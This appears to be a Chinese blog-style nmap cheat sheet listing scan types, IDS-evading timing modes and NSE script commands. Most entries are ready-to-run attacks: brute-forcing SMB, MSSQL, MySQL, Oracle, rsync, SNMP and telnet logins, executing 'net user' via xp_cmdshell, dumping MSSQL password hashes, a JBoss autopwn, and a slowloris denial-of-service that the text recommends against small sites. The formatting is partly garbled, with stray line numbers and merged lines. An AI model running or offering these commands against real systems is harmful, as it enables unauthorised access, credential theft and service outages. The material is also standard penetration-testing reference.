基本命令使用
格式:
nmap [ <扫描类型> …] [ <选项> ] { <扫描目标说明> }常用命令
全面扫描:nmap-T4 -A targetip
主机发现:nmap-T4 -sn targetip
端口扫描:nmap-T4 targetip
服务扫描:nmap-T4 -sV targetip
操作系统扫描:nmap-T4 -O targetip扫描类型
1
2
3
4
5
6
7-sP 只探测主机在线情况
-sS SYN扫描(隐身扫描)
-ST TCP扫描
-sU UDP扫描
-sV 系统版本检测
-O 操作系统识别
–scanflags 指定TCP标识位(设置URG, ACK, PSH,RST,SYN,FIN位)时序选项
1
2
3
4
5
6-T0 偏执的:非常非常慢,用于IDS逃逸
-T1 猥琐的:相当慢,用于IDS逃逸
-T2 有礼貌的:降低速度以消耗更小的带宽,比默认慢十倍
-T3 普通的:默认,根据目标的反应自动调整时间模式
-T4 野蛮的:假定处在一个很好的网络环境,请求可能会淹没目标
-T5 疯狂的:非常野蛮,很可能会淹没目标端口或是漏掉一些开放端口
脚本使用
脚本命令参数
1 | -sC 等价于–script=default,使用默认类别的脚本进行扫描 可更换其他类别 |
脚本分类
1 | auth 负责处理鉴权证书(绕开鉴权)绕过目标主机得访问控制的脚本 |
按脚本分类扫描
1 | # 负责处理鉴权证书(绕开鉴权)的脚本,也可以作为检测部分应用弱口令 |
按应用服务扫描
vnc扫描:
- 检查vnc bypass
nmap –script=realvnc-auth-bypass 192.168.137.4
- 检查vnc认证方式
nmap –script=vnc-auth 192.168.137.4
- 获取vnc信息
nmap –script=vnc-info 192.168.137.4
smb扫描:
- smb破解
nmap –script=smb-brute.nse -p445 192.168.137.4
- smb字典破解
nmap –script=smb-brute.nse –script-args=userdb=/var/passwd,passdb=/var/passwd 192.168.137.4
- smb已知几个严重漏
nmap –script=smb-check-vulns.nse –script-args=unsafe=1 192.168.137.4
- 查看共享目录
nmap -p 445 –script smb-ls –script-args ‘share=e$,path=\,smbuser=test,smbpass=test’ 192.168.137.4
- smb-psexec: 用登陆凭据作为脚本参数,在目标机器上运行一系列程序(注:需要下载nmap_service)
nmap –script smb-psexec.nse –script-args=smbuser=
,smbpass= [,config= ] -p445 - 查看会话
nmap -n -p445 –script=smb-enum-sessions.nse –script-args=smbuser=test,smbpass=test 192.168.137.4
- 系统信息
nmap -n -p445 –script=smb-os-discovery.nse –script-args=smbuser=test,smbpass=test 192.168.137.4
Mssql扫描:
- 猜解mssql用户名和密码
nmap -p1433 –script=ms-sql-brute –script-args=userdb=/var/passwd,passdb=/var/passwd 192.168.137.4
- xp_cmdshell 执行命令
nmap -p 1433 –script ms-sql-xp-cmdshell –script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd=”net user” 192.168.137.4
- dumphash值
nmap -p 1433 –script ms-sql-dump-hashes.nse –script-args mssql.username=sa,mssql.password=sa 192.168.137.4
Mysql扫描:
- 检查mysql空密码
nmap -p 3306 –script=mysql-empty-password.nse 192.168.1.114
- 如果没有空密码,则可以使用自带的暴力破解功能尝试破解
nmap -p 3306 –script=mysql-brute.nse 192.168.1.114
- 如果知道了用户名与密码,可以枚举数据库中的用户
nmap -p 3306 –script=mysql-users.nse –script-args=mysqluser=root 192.168.1.114
- 枚举mysql用户信息
nmap -p 3306 –script=mysql-enum.nse 192.168.1.114
- 支持同一应用的所有脚本扫描
nmap –script=mysql-* 192.168.137.4
Oracle扫描:
- oracle sid扫描
nmap –script=oracle-sid-brute -p 1521-1560 192.168.137.5
- oracle弱口令破解
nmap –script oracle-brute -p 1521 –script-args oracle-brute.sid=ORCL,userdb=/var/passwd,passdb=/var/passwd 192.168.137.5
其他一些比较好用的脚本
nmap –script=broadcast-netbios-master-browser 192.168.137.4
发现网关
nmap -p 873 –script rsync-brute –script-args ‘rsync-brute.module=www’ 192.168.137.4破解rsync
nmap –script informix-brute -p 9088 192.168.137.4informix数据库破解
nmap -p 5432 –script pgsql-brute 192.168.137.4pgsql破解
nmap -sU –script snmp-brute 192.168.137.4snmp破解
nmap -sV –script=telnet-brute 192.168.137.4telnet破解
nmap –script=http-vuln-cve2010-0738 –script-args ‘http-vuln-cve2010-0738.paths={/path1/,/path2/}’jboss autopwn
nmap –script=http-methods.nse 192.168.137.4检查http方法
nmap –script http-slowloris –max-parallelism 400 192.168.137.4dos攻击
,对于处理能力较小的站点还挺好用的 ‘half-HTTP’ connections
nmap –script=samba-vuln-cve-2012-1182 -p 139 192.168.137.4不靠谱的脚本:
vnc-brute 次数多了会禁止连接
pcanywhere-brute 同上
附上常用端口服务
参考链接:
https://www.cnblogs.com/zhaijiahui/p/8367327.html
https://www.cnblogs.com/h4ck0ne/p/5154683.html